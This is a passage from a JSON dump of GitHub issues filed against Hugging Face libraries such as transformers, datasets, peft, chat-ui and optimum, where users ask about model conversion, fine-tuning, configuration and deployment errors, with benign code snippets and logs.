datasets to support my requirement?\r\n\n\n### Open source status\n\n- [ ] The model implementation is available\n- [ ] The model weights are available\n\n### Provide useful links for the implementation\n\n_No response_", "url": "https://github.com/huggingface/transformers/issues/28259", "state": "open", "labels": [ "New model" ], "created_at": "2023-12-27T12:15:26Z", "updated_at": "2023-12-27T12:15:26Z", "user": "Sandspeare" }, { "repo": "huggingface/accelerate", "number": 2289, "title": "[QUESTION] why stage3_gather_16bit_weights_on_model_save is set to false no matter what its value is in the deepspeed config", "body": "[`accelerator._prepare_deepspeed()`](https://github.com/huggingface/accelerate/blob/d08c23c20975f39393b431143237c193733e7bb8/src/accelerate/accelerator.py#L1464C13-L1464C82) appears to force `stage3_gather_16bit_weights_on_model_save` to `false`, which should raise an exception in [`accelerator.get_state_dict()`](https://github.com/huggingface/accelerate/blob/d08c23c20975f39393b431143237c193733e7bb8/src/accelerate/accelerator.py#L2985C17-L2985C68). Additionally, [`trainer.save_model()`](https://github.com/huggingface/transformers/blob/c48787f347bd604f656c2cfff730e029c8f8c1fe/src/transformers/trainer.py#L2827C17-L2827C77) invokes the above function, then catches this exception and raises another exception. Yet, the log seems totally fine. I'm confused... Why does this happen?", "url": "https://github.com/huggingface/accelerate/issues/2289", "state": "closed", "labels": [], "created_at": "2023-12-27T10:04:28Z", "updated_at": "2024-01-05T06:59:16Z", "user": "LaniakeaS" }, { "repo": "huggingface/diffusers", "number": 6352, "title": "how to choose save precision for lora file in training", "body": "I'm confused about my LoRA precision (fp16, bf16, float) and whether I can choose the precision of my LoRA weights.
I searched the params of the **StableDiffusionXLPipeline.save_lora_weights** function used to save LoRA in the SDXL text2img training script and didn't find a param like 'save_precision' or similar.\r\n\r\nCan anyone help? Thanks!\r\n\r\n", "url": "https://github.com/huggingface/diffusers/issues/6352", "state": "closed", "labels": [], "created_at": "2023-12-27T09:02:47Z", "updated_at": "2023-12-28T08:21:29Z", "user": "DoctorTar" }, { "repo": "huggingface/transformers.js", "number": 481, "title": "Why do certain models not load?", "body": "### Question\n\nI was keen to try:\r\n\r\nhttps://huggingface.co/upstage/SOLAR-10.7B-Instruct-v1.0\r\n\r\nI tried:\r\n\r\n```ts\r\nimport {\r\n AutoModelForCausalLM,\r\n AutoTokenizer,\r\n} from '@xenova/transformers';\r\n\r\nconst autoTokenizer = await AutoTokenizer.from_pretrained(\r\n 'Upstage/SOLAR-10.7B-Instruct-v1.0',\r\n);\r\n\r\nconst model = await AutoModelForCausalLM.from_pretrained(\r\n 'Upstage/SOLAR-10.7B-Instruct-v1.0',\r\n);\r\n```\r\n\r\nBut it fails with an error:\r\n\r\n```ts\r\nError: Could not locate file: \"https://huggingface.co/Upstage/SOLAR-10.7B-Instruct-v1.0/resolve/main/onnx/decoder_model_merged_quantized.onnx\".\r\n```\r\n\r\nIs this an error on my side, is the model incompatible, ... ?", "url": "https://github.com/huggingface/transformers.js/issues/481", "state": "open", "labels": [ "question" ], "created_at": "2023-12-27T01:44:52Z", "updated_at": "2024-05-10T18:21:57Z", "user": "adaboese" }, { "repo": "huggingface/peft", "number": 1298, "title": "[Question] What is the main difference between \"modules_to_save\" and \"target_modules\"?", "body": "Hi, in my work I need to add some special tokens to LLaMA, so I need to train the parameters of [\"embed_tokens\", \"lm_head\"] for both layers. What confuses me is whether I should add these parameters to LoraConfig's \"modules_to_save\" or \"target_modules\". Looking forward to your reply!", "url": "https://github.com/huggingface/peft/issues/1298", "state": "closed", "labels": [], "created_at": "2023-12-26T07:37:05Z", "updated_at": "2024-02-03T15:03:27Z", "user": "SatireY" }, { "repo": "huggingface/datasets", "number": 6534, "title": "How to configure multiple folders in the same zip package", "body": "How should I write the \"config\" in the README when all the data, such as the train and test splits, is in one zip file?\r\n\r\nThe train folder and test folder are both in data.zip.", "url": "https://github.com/huggingface/datasets/issues/6534", "state": "open", "labels": [], "created_at": "2023-12-26T03:56:20Z", "updated_at": "2023-12-26T06:31:16Z", "user": "d710055071" }, { "repo": "huggingface/trl", "number": 1140, "title": "How to additionally finetune with new data from a previous adapter?", "body": "Hi all, I have a question about finetuning. Currently I use SFTTrainer to finetune the Llama2-7b-chat model and save it in adapter format. The question is: in case I want to do additional finetuning with new data starting from the previous adapter, how should I do it? Normally I do additional finetuning by merging the adapter with the base model before finetuning it. I'm not sure whether my method is correct or not, or whether there is another method that is easier than this.\r\nThanks", "url": "https://github.com/huggingface/trl/issues/1140", "state": "closed", "labels": [], "created_at": "2023-12-25T04:19:34Z", "updated_at": "2024-02-01T15:05:24Z", "user": "SiraHaruethaipree" }, { "repo": "huggingface/optimum", "number": 1613, "title": "Convert opus translation to onnx and run inference from it", "body": "To convert I use this snippet\r\n```\r\nfrom transformers import AutoTokenizer, AutoModelForSeq2SeqLM\r\nfrom transformers.models.marian import MarianOnnxConfig\r\nimport onnxruntime as ort\r\nmodel_ckpt = \"Helsinki-NLP/opus-mt-en-zh\"\r\ntokenizer = AutoTokenizer.from_pretrained(model_ckpt)\r\nref_model = AutoModelForSeq2SeqLM.from_pretrained(model_ckpt)\r\nfeature = \"seq2seq-lm\"\r\nonnx_path = f\"onnx/{model_ckpt}-{feature}/\"\r\n\r\n!python -m transformers.onnx --model={model_ckpt} --atol=1e-4 --feature={feature} {onnx_path}\r\n```\r\n\r\nTo run inference (which is not working) I use this snippet\r\n```\r\nimport torch\r\nfrom transformers import AutoTokenizer, pipeline\r\nfrom optimum.onnxruntime import ORTModelForSeq2SeqLM\r\n\r\nmodel = ORTModelForSeq2SeqLM.from_pretrained(\"./onnx/Helsinki-NLP/opus-mt-en-zh-seq2seq-lm\")\r\n```\r\n\r\nThe error is \r\n```\r\nFileNotFoundError: Could not find any ONNX model file for the regex ['(.*)?decoder(.*)?with_past(.*)?\\\\.onnx'] \r\n```\r\n\r\nMaybe it tries to find model.onnx, but in the folder there are 2 ONNX files: decoder_model.onnx and encoder_model.onnx.\r\n\r\nI think the snippet is from 2022; have there been any changes? \r\nThanks", "url": "https://github.com/huggingface/optimum/issues/1613", "state": "closed", "labels": [], "created_at": "2023-12-25T04:04:47Z", "updated_at": "2025-04-29T01:45:20Z", "comments": 5, "user": "x4080" }, { "repo": "huggingface/chat-ui", "number": 658, "title": "chat-ui does not support TGI http url when deployed publicly", "body": "hi @nsarrazin, the chat-ui works well locally\r\n~~~\r\n# .env.local\r\nendpoints: [{\"type\":\"tgi\",\"url\":\"http://127.0.0.1:8080/generate_stream\"}]\r\n~~~\r\n\r\nbut if I deploy it publicly and chat from an external browser, I get the 403 error:\r\n~~~\r\n403\r\nYou don't have access to this conversation. If someone gave you this link, ask them to use the 'share' feature instead.\r\n~~~\r\n\r\nthis may be related to this issue: https://github.com/huggingface/chat-ui/issues/364\r\n\r\nit seems that chat-ui only supports HTTPS URLs, but TGI only supports HTTP URLs, which conflicts. How can this be fixed? \r\n", "url": "https://github.com/huggingface/chat-ui/issues/658", "state": "closed", "labels": [], "created_at": "2023-12-25T03:08:10Z", "updated_at": "2024-04-25T16:27:52Z", "comments": 1, "user": "walkacross" }, { "repo": "huggingface/transformers.js", "number": 475, "title": "How to use your own models", "body": "### Question\n\nHey, I really appreciate your work here!\r\n\r\nI'm very interested in setting up a perfect RAG pipeline / flow, and therefore I need good document extraction with table-transformers and layout detection. \r\n\r\nExample : \r\nhttps://github.com/deepdoctection/deepdoctection\r\n\r\nWhere I'd use \r\nhttps://huggingface.co/microsoft/layoutlmv3-base\r\n\r\nhttps://huggingface.co/microsoft/table-transformer-detection\r\n\r\nI could ask you if you would add one of these, but I want to try it myself.\r\nAs I understand, I can use your script and deploy it on my huggingface.co so I could consume it. Is this right?
\r\n\r\n", "url": "https://github.com/huggingface/transformers.js/issues/475", "state": "closed", "labels": [ "question" ], "created_at": "2023-12-24T21:38:02Z", "updated_at": "2024-05-15T09:32:26Z", "user": "DomEscobar" }, { "repo": "huggingface/datasets", "number": 6530, "title": "Impossible to save a mapped dataset to disk", "body": "### Describe the bug\r\n\r\nI want to play around with different hyperparameters when training but don't want to re-map my dataset with 3 million samples each time for tens of hours when I [fully fine-tune SDXL](https://github.com/huggingface/diffusers/blob/main/examples/text_to_image/train_text_to_image_sdxl.py).\r\n\r\nAfter I do the mapping like this:\r\n```\r\ntrain_dataset = train_dataset.map(compute_embeddings_fn, batched=True)\r\ntrain_dataset = train_dataset.map(\r\n compute_vae_encodings_fn,\r\n batched=True,\r\n batch_size=16,\r\n)\r\n```\r\nand try to save it like this:\r\n`train_dataset.save_to_disk(\"test\")`\r\ni get this error ([full traceback](https://pastebin.com/kq3vt739)):\r\n```\r\nTypeError: Object of type function is not JSON serializable\r\nThe format kwargs must be JSON serializable, but key 'transform' isn't.\r\n```\r\n\r\nBut what is interesting is that pushing to hub works like that:\r\n`train_dataset.push_to_hub(\"kopyl/mapped-833-icons-sdxl-1024-dataset\", token=True)`\r\nHere is the link of the pushed dataset: https://huggingface.co/datasets/kopyl/mapped-833-icons-sdxl-1024-dataset\r\n\r\n### Steps to reproduce the bug\r\n\r\nHere is the self-contained notebook:\r\n\r\nhttps://colab.research.google.com/drive/1RtCsEMVcwWcMwlWURk_cj_9xUBHz065M?usp=sharing\r\n\r\n### Expected behavior\r\n\r\nIt should be easily saved to disk\r\n\r\n### Environment info\r\n\r\nNVIDIA A100, Linux (NC24ads A100 v4 from Azure), CUDA 12.2.\r\n\r\n[pip freeze](https://pastebin.com/QTNb6iru)", "url": "https://github.com/huggingface/datasets/issues/6530", "state": "open", "labels": [], "created_at": "2023-12-23T15:18:27Z", "updated_at": "2023-12-24T09:40:30Z", "comments": 1, "user": "kopyl" }, { "repo": "huggingface/sentence-transformers", "number": 2392, "title": "util.paraphrase_mining returning scores only above 0.98", "body": "Hey,\r\nI'm using util.paraphrase_mining (sentence-transformers v2.2.2) to get similarity scores (cosine) in a corpus of ~20k texts with the encoder model being all-MiniLM-L6-v2 and with the parameters query_chunk_size=500, corpus_chunk_size=1000, top_k=500000, max_pairs=5000000. \r\nThe returned list of triplets contain scores only above 0.98. I was wondering why the lower scores don't appear. \r\nThanks in advance for your answer!", "url": "https://github.com/huggingface/sentence-transformers/issues/2392", "state": "closed", "labels": [ "question" ], "created_at": "2023-12-23T13:00:27Z", "updated_at": "2024-01-29T14:20:33Z", "user": "sinangokce" }, { "repo": "huggingface/chat-ui", "number": 656, "title": "Web Search failed with \"Invalid URL\"", "body": "![image](https://github.com/huggingface/chat-ui/assets/4380009/229430b6-6d10-495f-be66-c5bc54f6061d)\r\n\r\nWhy is this happening? 
It seems to happen regardless of whether I have USE_LOCAL_WEBSEARCH set to true or false.\r\n```\r\nSERPAPI_KEY=\r\nUSE_LOCAL_WEBSEARCH=true\r\n\r\nMODELS=`[\r\n {\r\n \"name\": \"mistralai/Mixtral-8x7b-Instruct-v0.1\",\r\n \"displayName\": \"mistralai/Mixtral-8x7b-Instruct-v0.1\",\r\n \"description\": \"Mixtral-8x7b-Instruct-v0.1 is a state of the art language model, based on a mixture of experts, that outperforms ChatGPT.\",\r\n \"websiteUrl\": \"https://www.aaprintsupplyco.com\",\r\n \"preprompt\": \"\",\r\n \"chatPromptTemplate\" : \"{{#each messages}}{{#ifUser}}[INST] {{#if @first}}{{#if @root.preprompt}}{{@root.preprompt}}\\n{{/if}}{{/if}}{{content}} [/INST]{{/ifUser}}{{#ifAssistant}}{{content}}{{/ifAssistant}}{{/each}}\",\r\n \"parameters\": {\r\n \"temperature\": 0.4,\r\n \"top_p\": 0.95,\r\n \"top_k\": 50,\r\n \"truncate\": 31768,\r\n \"max_new_tokens\": 2048,\r\n \"stop\": [\"[INST]\",\"\"]\r\n },\r\n \"endpoints\" : [{\r\n \"type\": \"openai\",\r\n \"baseURL\": \"https://api.together.xyz/v1\"\r\n }],\r\n \"promptExamples\": [\r\n {\r\n \"title\": \"Write a blog post\",\r\n \"prompt\": \"Your goal is to help me create a compelling blog post about a topic.\\nYou will follow the following process:\\n\\n1. Ask me for the topic of the blog post.\\n2. After I provide my answer you will need to collect some additional information by going through the next steps:\\na) Questions (ask any relevant questions pertaining to what additional information is needed from me to write a good blog post).\\n\\nOnce you have enough information, or once I say I am done, you will write the blog post.\"\r\n }, {\r\n \"title\": \"Improve my English\",\r\n \"prompt\": \"I want you to act as an English grammar and spelling corrector and improver. I will speak to you and you will answer in the corrected and improved version of my text, in English. I want you to replace my simplified A0-level words and sentences with improved, higher level English words and sentences. Keep the meaning same, but make them sound better. I want you to only reply the correction, the improvements and nothing else, do not write explanations. If there is nothing to improve, just reply with the original text.\"\r\n }, {\r\n \"title\": \"Assist in a task\",\r\n \"prompt\": \"I want you to be my Prompt engineer. Your goal is to help me craft the best possible instruction prompt for my needs. The prompt will be used by you, an AI model. You will follow the following process:\\n\\n1. Your first response will be to simply ask me what the task I want to accomplish. \\n2. After I provide my answer and you will generate a first iteration of the prompt, but we will need to improve it through continual iterations by going through the next steps. You will generate two sections:\\na) Revised prompt (provide your rewritten prompt, it should be clear, concise, and easily understood by you),\\nb) Questions (ask any relevant questions pertaining to what additional information is needed from me to improve the prompt).\\n3. We will continue this iterative process with me providing additional information to you and you updating the prompt in the Revised prompt section until I say we are done.\\n\\nOnly after I say I am done, will you provide a response to the revised prompt.\"\r\n }\r\n ]\r\n },\r\n {\r\n \"name\": \"openchat/openchat-3.5-1210\",\r\n \"displayName\": \"openchat/openchat-3.5-1210\",\r\n \"description\": \"OpenChat 3.5 is the #1 model on MT-Bench, with only 7B parameters. 
Small and fast.\",\r\n \"websiteUrl\": \"https://www.aaprintsupplyco.com\",\r\n \"preprompt\": \"\",\r\n \"chatPromptTemplate\" : \"{{#each messages}}{{#ifUser}}GPT4 Correct User: {{#if @first}}{{#if @root.preprompt}}{{@root.preprompt}}\\n{{/if}}{{/if}}{{content}}<|end_of_turn|>GPT4 Correct Assistant:{{/ifUser}}{{#ifAssistant}}{{content}}<|end_of_turn|>{{/ifAssistant}}{{/each}}\",\r\n \"parameters\": {\r\n \"temperature\": 0.4,\r\n \"top_p\": 0.95,\r\n \"top_k\": 50,\r\n \"truncate\": 8192,\r\n \"max_new_tokens\": 1024,\r\n \"stop\": [\"<|end_of_turn|>\",\"\"]\r\n },\r\n \"endpoints\" : [{\r\n \"type\": \"openai\",\r\n \"baseURL\": \"https://api.together.xyz/v1\"\r\n }],\r\n \"promptExamples\": [\r\n {\r\n \"title\": \"Write a blog post\",\r\n \"prompt\": \"Your goal is to help me create a compelling blog post about a topic.\\nYou will follow the following process:\\n\\n1. Ask me for the topic of the blog post.\\n2. After I provide my answer you will need to collect some additional information by going through the next steps:\\na) Questions (ask any relevant questions pertaining to what additional information is needed from me to write a good blog post).\\n\\nOnce you have enough information, or once I say I am done, you will write the blog post.\"\r\n }, {\r\n \"titl", "url": "https://github.com/huggingface/chat-ui/issues/656", "state": "closed", "labels": [], "created_at": "2023-12-22T19:19:34Z", "updated_at": "2024-01-09T05:45:13Z", "comments": 5, "user": "gururise" }, { "repo": "huggingface/chat-ui", "number": 655, "title": "Generation failed (Module.summarize) when using TogetherAI openai compatible endpoint", "body": "TogetherAI offers an [OpenAI compatible endpoint](https://docs.together.ai/docs/openai-api-compatibility). When using this endpoint with the model setup as follows:\r\n\r\n```\r\nMODELS=`[\r\n {\r\n \"name\": \"mistralai/Mixtral-8x7b-Instruct-v0.1\",\r\n \"displayName\": \"Mixtral-8x7b\",\r\n \"endpoints\" : [{\r\n \"type\": \"openai\",\r\n \"baseURL\": \"https://api.together.xyz/v1\"\r\n }],\r\n \"promptExamples\": [\r\n {\r\n \"title\": \"Write an email from bullet list\",\r\n \"prompt\": \"As a restaurant owner, write a professional email to the supplier to get these products every week: \\n\\n- Wine (x10)\\n- Eggs (x24)\\n- Bread (x12)\"\r\n }, {\r\n \"title\": \"Code a snake game\",\r\n \"prompt\": \"Code a basic snake game in python, give explanations for each step.\"\r\n }, {\r\n \"title\": \"Assist in a task\",\r\n \"prompt\": \"How do I make a delicious lemon cheesecake?\"\r\n }\r\n ]\r\n }\r\n]`\r\n\r\nTASK_MODEL=`{\r\n \"name\": \"openchat/openchat-3.5-1210\",\r\n \"chatPromptTemplate\" : \"{{#each messages}}{{#ifUser}}GPT4 Correct User: {{#if @first}}{{#if @root.preprompt}}{{@root.preprompt}}\\n{{/if}}{{/if}}{{content}}<|end_of_turn|>GPT4 Correct Assistant:{{/ifUser}}{{#ifAssistant}}{{content}}<|end_of_turn|>{{/ifAssistant}}{{/each}}\",\r\n \"parameters\": {\r\n \"temperature\": 0.1,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 3072,\r\n \"max_new_tokens\": 1024,\r\n \"stop\": [\"<|end_of_turn|>\",\"\"]\r\n },\r\n \"endpoints\" : [{\r\n \"type\": \"openai\",\r\n \"baseURL\": \"https://api.together.xyz/v1\"\r\n }]\r\n}`\r\n```\r\n\r\nInference and streaming work just fine with the output displayed in the chat window; however, in the console, the **following error always appears** after every interaction, and the conversation titles are never summarized.\r\n```\r\nError: Generation failed\r\n at 
Module.generateFromDefaultEndpoint (/home/gene/Downloads/chat-ui/src/lib/server/generateFromDefaultEndpoint.ts:22:9)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async Module.summarize (/home/gene/Downloads/chat-ui/src/lib/server/summarize.ts:28:10)\r\n at async eval (/home/gene/Downloads/chat-ui/src/routes/conversation/[id]/+server.ts:167:26)\r\n```\r\n\r\nEven if I try setting TASK_MODEL='mistralai/Mixtral-8x7b-Instruct-v0.1', I still get this error.", "url": "https://github.com/huggingface/chat-ui/issues/655", "state": "open", "labels": [], "created_at": "2023-12-22T17:34:59Z", "updated_at": "2024-01-23T05:14:26Z", "comments": 1, "user": "gururise" }, { "repo": "huggingface/datasets", "number": 6529, "title": "Impossible to only download a test split", "body": "I've spent a significant amount of time trying to locate the split object inside my _split_generators() custom function.\r\nThen, after diving [in the code](https://github.com/huggingface/datasets/blob/5ff3670c18ed34fa8ddfa70a9aa403ae6cc9ad54/src/datasets/load.py#L2558), I realized that `download_and_prepare` is executed first; `split` is only passed to the dataset builder in `as_dataset`.\r\n\r\nIf I'm not missing something, this seems like bad design, for the following use case:\r\n\r\n> Imagine there is a huge dataset that has an evaluation test set and you want to just download and run just to compare your method.\r\n\r\nIs there a current workaround that can help me achieve the same result?\r\n\r\nThank you,", "url": "https://github.com/huggingface/datasets/issues/6529", "state": "open", "labels": [], "created_at": "2023-12-22T16:56:32Z", "updated_at": "2024-02-02T00:05:04Z", "comments": 2, "user": "ysig" }, { "repo": "huggingface/transformers.js", "number": 470, "title": "How to convert a model with a .pt extension", "body": "### Question\n\nI'm new to this area; I'm wondering how to convert a model with a .pt extension? Thanks a lot", "url": "https://github.com/huggingface/transformers.js/issues/470", "state": "open", "labels": [ "question" ], "created_at": "2023-12-22T10:20:16Z", "updated_at": "2023-12-23T20:46:37Z", "user": "Bzayyz" }, { "repo": "huggingface/transformers.js", "number": 469, "title": "How to convert a model with a .pt extension", "body": "### Question\n\nI'm new to this area; I'm wondering how to convert a model with a .p2 extension? Thanks a lot", "url": "https://github.com/huggingface/transformers.js/issues/469", "state": "closed", "labels": [ "question" ], "created_at": "2023-12-22T10:20:05Z", "updated_at": "2023-12-22T10:20:54Z", "user": "Bzayyz" }, { "repo": "huggingface/chat-ui", "number": 650, "title": "chat-ui docker image failed to connect to the mongo docker container", "body": "step 1: build the chat-ui image\r\n~~~\r\ndocker build -t chat-ui -f ./Dockerfile.local .\r\n~~~\r\n\r\nstep 2:\r\n~~~\r\n# bind the 27016\r\ndocker run -d -p 27016:27017 --name mongo-chatui mongo:latest\r\n~~~\r\n\r\nstep 3: run a container\r\n~~~\r\n# add a .env.local config\r\nMONGODB_URL=mongodb://localhost:27016\r\nHF_TOKEN=\r\n~~~\r\n\r\n~~~\r\ndocker run --rm --mount type=bind,source=\"$(pwd)/.env.local\",target=/app/.env.local -p 3000:3000 chat-ui\r\n~~~\r\n\r\n\r\n## results: when loading localhost:3000\r\n~~~\r\nMongoServerSelectionError: connect ECONNREFUSED 127.0.0.1:27016\r\nat Timeout._onTimeout (/app/node_modules/mongodb/lib/sdam/topology.js:278:38)\r\nat listOnTimeout (node:internal/timers:573:17)\r\nat process.processTimers (node:internal/timers:514:7) {\r\nreason: TopologyDescription {\r\ntype:
'Unknown',\r\nservers: Map(1) { 'localhost:27016' => [ServerDescription] },\r\nstale: false,\r\ncompatible: true,\r\nheartbeatFrequencyMS: 10000,\r\nlocalThresholdMS: 15,\r\nsetName: null,\r\nmaxElectionId: null,\r\nmaxSetVersion: null,\r\ncommonWireVersion: 0,\r\nlogicalSessionTimeoutMinutes: null\r\n},\r\ncode: undefined,\r\n[Symbol(errorLabels)]: Set(0) {}\r\n}\r\nMongoTopologyClosedError: Topology is closed\r\nat /app/node_modules/mongodb/lib/sdam/topology.js:218:46 {\r\n[Symbol(errorLabels)]: Set(0) {}\r\n}\r\nMongoTopologyClosedError: Topology is closed\r\nat processWaitQueue (/app/node_modules/mongodb/lib/sdam/topology.js:514:46)\r\nat Topology.selectServer (/app/node_modules/mongodb/lib/sdam/topology.js:283:9)\r\nat Topology. (/app/node_modules/mongodb/lib/sdam/topology.js:42:94)\r\nat node:internal/util:442:7\r\nat new Promise ()\r\nat Topology.selectServerAsync (node:internal/util:428:12)\r\nat executeOperationAsync (/app/node_modules/mongodb/lib/operations/execute_operation.js:74:35)\r\nat /app/node_modules/mongodb/lib/operations/execute_operation.js:12:45\r\nat maybeCallback (/app/node_modules/mongodb/lib/utils.js:293:21)\r\nat executeOperation (/app/node_modules/mongodb/lib/operations/execute_operation.js:12:38) {\r\n[Symbol(errorLabels)]: Set(0) {}\r\n}\r\n~~~\r\n\r\n@nsarrazin", "url": "https://github.com/huggingface/chat-ui/issues/650", "state": "open", "labels": [ "support", "docker" ], "created_at": "2023-12-22T08:34:52Z", "updated_at": "2025-05-25T20:37:17Z", "comments": 6, "user": "walkacross" }, { "repo": "huggingface/chat-ui", "number": 649, "title": "Formatting is incorrect when using LiteLLM (Together.ai)", "body": "I'm using Mixtral-7b-Instruct-v0.1 via [LiteLLM](https://github.com/BerriAI/litellm) to provide a OpenAI compatible API to together.ai where the model is hosted. \r\n\r\nEverything works fine, including streaming; however, the formatting is messed up as shown. Any ideas why?\r\n![image](https://github.com/huggingface/chat-ui/assets/4380009/6855fad2-288f-403e-9ab8-1f2f409fe5c9)\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/649", "state": "closed", "labels": [ "bug", "question", "front", "models" ], "created_at": "2023-12-22T05:46:37Z", "updated_at": "2023-12-22T17:11:09Z", "user": "gururise" }, { "repo": "huggingface/distil-whisper", "number": 67, "title": "I can only use its encoder to extract audio features, right? How should I use it? Could you provide an example", "body": "I can only use its encoder to extract audio features, right? How should I use it? Could you provide an example", "url": "https://github.com/huggingface/distil-whisper/issues/67", "state": "open", "labels": [], "created_at": "2023-12-22T03:50:32Z", "updated_at": "2024-01-15T18:07:34Z", "user": "wvinzh" }, { "repo": "huggingface/transformers.js", "number": 468, "title": "Node.js", "body": "### Question\n\nWill this library work with Node.js?", "url": "https://github.com/huggingface/transformers.js/issues/468", "state": "closed", "labels": [ "question" ], "created_at": "2023-12-21T23:03:36Z", "updated_at": "2023-12-21T23:06:53Z", "user": "Julianbullmagic" }, { "repo": "huggingface/gsplat.js", "number": 47, "title": "I don't need to load loading and onProgress\uff0cWhen data is loaded, how can I render it on the interface immediately?", "body": "I don't need to load loading\uff0cWhen data is loaded, how can I render it on the interface immediately? 
I looked at the `Loader` class, but nothing's been done there", "url": "https://github.com/huggingface/gsplat.js/issues/47", "state": "closed", "labels": [], "created_at": "2023-12-21T20:13:52Z", "updated_at": "2024-01-29T20:15:01Z", "user": "did66" }, { "repo": "huggingface/candle", "number": 1463, "title": "How to introduce OpenAI Triton in candle?", "body": "The handwritten CUDA operator is very complicated. How can we use OpenAI Triton in candle to simplify this process? :)", "url": "https://github.com/huggingface/candle/issues/1463", "state": "open", "labels": [], "created_at": "2023-12-21T18:42:38Z", "updated_at": "2024-01-01T11:56:29Z", "user": "tyfeng1997" }, { "repo": "huggingface/transformers", "number": 28179, "title": "How to fine-tune facebook/esm2_t33_650M_UR50D", "body": "### System Info\n\nHow to fine-tune facebook/esm2_t33_650M_UR50D? It's too big and model.half() couldn't work. Besides, I always get the error: CUDA error: CUBLAS_STATUS_INTERNAL_ERROR when calling `cublasSgemm( handle, opa, opb, m, n, k, &alpha, a, lda, b, ldb, &beta, c, ldc)`. Is it possible that the model on the Hugging Face Hub is wrong?\r\nThe following is the script:\r\nfrom os.path import join\r\nimport os\r\nimport pandas as pd\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch.optim as optim\r\nimport torch.utils.data as data\r\nimport transformers\r\nfrom transformers import AutoTokenizer, AutoModelForSequenceClassification, Trainer\r\nfrom datasets import Dataset,load_metric\r\nfrom sklearn.model_selection import train_test_split\r\n#os.environ['CUDA_VISIBLE_DEVICES'] = '1'\r\nCURRENT_DIR = os.getcwd()\r\ncheck_point = join(CURRENT_DIR,\"esm1b_t33_650M_UR50S\")\r\n\r\n#Data processing\r\ndef process_tsv(file):\r\n sequences = list()\r\n labels = list()\r\n df = pd.read_csv(file,sep=\"\\t\")\r\n for ind in df.index:\r\n sequences.append(df[\"sequence\"][ind])\r\n labels.append(df[\"label\"][ind])\r\n\r\n return sequences,labels\r\n\r\n\r\ndef tokenize_add_label(sequences, labels, tokenizer):\r\n \"\"\"This function takes sequences and labels, creates a Dataset containing tokenized sequences, and adds labels to it\r\n\r\n args:\r\n sequences (str): a list of sequences\r\n labels (int): a list of labels\r\n tokenizer : a pre-trained tokenizer\r\n\r\n return:\r\n Dataset: tokenized sequences and associated labels\"\"\"\r\n sequences_tokenized = tokenizer(sequences, padding=True, truncation=True)\r\n sequences_tokenized = torch.float16(sequences_tokenized)\r\n labels = torch.tensor(labels)\r\n labels = labels.long()\r\n sequences_dataset = Dataset.from_dict(sequences_tokenized)\r\n sequences_dataset = sequences_dataset.add_column(\"labels\", labels)\r\n\r\n return sequences_dataset\r\n\r\nsequences,labels = process_tsv(join(CURRENT_DIR,\"example.tsv\"))\r\ntokenizer = AutoTokenizer.from_pretrained(check_point)\r\nsequences_dataset = tokenize_add_label(sequences,labels,tokenizer)\r\nnum_labels = max(labels)+1\r\nmodel = AutoModelForSequenceClassification.from_pretrained(check_point,num_labels=num_labels)\r\n#device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\r\n#model.to(device)\r\nmodel.cuda()\r\n\r\n\r\n#model = model.half()\r\n\r\n#model.enable_input_require_grads()\r\nmodel_name = check_point.split(\"/\")[-1]\r\ntrainer_dir = f\"{model_name}-finetuned-model_esm-1b_on_7beta\"\r\nif not os.path.exists(trainer_dir):\r\n os.mkdir(trainer_dir)\r\n\r\nbatch_size = 1\r\ntraining_args = transformers.TrainingArguments(\r\n 
output_dir=trainer_dir, # output directory\r\n overwrite_output_dir=True,\r\n num_train_epochs=3, # total number of training epochs\r\n per_device_train_batch_size=batch_size, # batch size per device during training\r\n per_device_eval_batch_size=batch_size, # batch size for evaluation\r\n learning_rate=2e-5,\r\n warmup_steps=500, # number of warmup steps for learning rate scheduler\r\n weight_decay=0.01, # strength of weight decay\r\n logging_dir=trainer_dir, # directory for storing logs\r\n logging_steps=10,\r\n load_best_model_at_end=True,\r\n evaluation_strategy=\"epoch\",\r\n save_strategy=\"epoch\",\r\n save_total_limit=1,\r\n metric_for_best_model=\"accuracy\",\r\n greater_is_better=True,\r\n disable_tqdm=True,\r\n gradient_accumulation_steps = 2,\r\n gradient_checkpointing=True\r\n\r\n )\r\n\r\nmetric = load_metric(join(CURRENT_DIR,\"metrics\",\"accuracy/accuracy.py\"))\r\n\r\ndef compute_metrics(eval_pred):\r\n logits, labels = eval_pred\r\n print(\"logits\",logits)\r\n print(\"labels\",labels)\r\n predictions = np.argmax(logits, axis=-1)\r\n print(\"predictions\",predictions)\r\n return metric.compute(predictions=predictions, references=labels)\r\n\r\ntrainer = Trainer(\r\n model = model,\r\n args = training_args,\r\n train_dataset=sequences_dataset,\r\n eval_dataset=sequences_dataset,\r\n tokenizer=tokenizer,\r\n compute_metrics=compute_metrics,\r\n\r\n)\r\n\r\nmodel.config.problem_type\r\ntrainer.train()\r\ntrainer.state.log_history\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\nAsking to truncate to max_length but no maximum length is provided and the model has no predefined maximum length. 
Default to no truncation.\r\nSome weights of EsmForSequenceClassification were not initialized from the model checkpoint at /home/wangmuqiang/fine_tune_esm2/esm1b_t33_650M_UR50S and are newly initialized: ['classifier.dense.bias', 'classifier.out_proj.bias', 'classifier.out_proj.weight', 'classifier.dense.weight']\r\nYou should probably TRAIN this model on a down-stream task to be able to use it fo", "url": "https://github.com/huggingface/transformers/issues/28179", "state": "closed", "labels": [], "created_at": "2023-12-21T09:50:27Z", "updated_at": "2024-01-30T08:03:39Z", "user": "Admire7494" }, { "repo": "huggingface/alignment-handbook", "number": 81, "title": "Why do we use a lower batch size when comparing SFT LoRA with SFT full fine-tuning?", "body": "https://github.com/huggingface/alignment-handbook/blob/main/recipes/zephyr-7b-beta/sft/config_lora.yaml\r\n\r\n", "url": "https://github.com/huggingface/alignment-handbook/issues/81", "state": "closed", "labels": [], "created_at": "2023-12-20T21:09:33Z", "updated_at": "2024-01-07T21:03:14Z", "comments": 2, "user": "shamanez" }, { "repo": "huggingface/trl", "number": 1115, "title": "How to prepare a 